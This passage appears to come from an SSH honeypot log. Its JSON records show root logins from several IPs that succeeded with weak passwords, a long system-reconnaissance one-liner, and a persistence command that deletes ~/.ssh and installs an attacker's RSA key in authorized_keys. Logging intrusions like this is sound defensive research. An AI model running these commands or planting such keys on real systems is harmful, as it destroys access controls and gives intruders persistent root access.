2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 123123
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "c22c321867e5",
"src_ip": "2.57.122.150",
"start_time": "2026-06-30T16:46:25.583471Z",
"end_time": "2026-06-30T16:46:26.845813Z",
"duration": "1.3",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "123123"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "ffaaf93a134e",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:44:05.443857Z",
"end_time": "2026-06-30T16:44:06.383559Z",
"duration": "0.9",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "1cacaa0fe69c",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:44:03.085990Z",
"end_time": "2026-06-30T16:44:05.287576Z",
"duration": "2.2",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / ww123456.
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "7e431111528f",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:44:01.193253Z",
"end_time": "2026-06-30T16:44:06.380594Z",
"duration": "5.2",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "ww123456."
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 111111
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "3f3be77fe727",
"src_ip": "2.57.122.150",
"start_time": "2026-06-30T16:42:50.363476Z",
"end_time": "2026-06-30T16:42:51.641465Z",
"duration": "1.3",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "111111"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "5aa0ee8869b1",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:41:16.259291Z",
"end_time": "2026-06-30T16:41:17.295477Z",
"duration": "1.0",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "fb19f4ddb2b0",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:41:14.167282Z",
"end_time": "2026-06-30T16:41:16.108848Z",
"duration": "1.9",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Ss@123456
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "0b8ad1892687",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:41:11.484770Z",
"end_time": "2026-06-30T16:41:17.290768Z",
"duration": "5.8",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Ss@123456"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / !root
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "ecd0b3832ce9",
"src_ip": "2.57.122.150",
"start_time": "2026-06-30T16:39:38.042078Z",
"end_time": "2026-06-30T16:39:39.332934Z",
"duration": "1.3",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "!root"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo 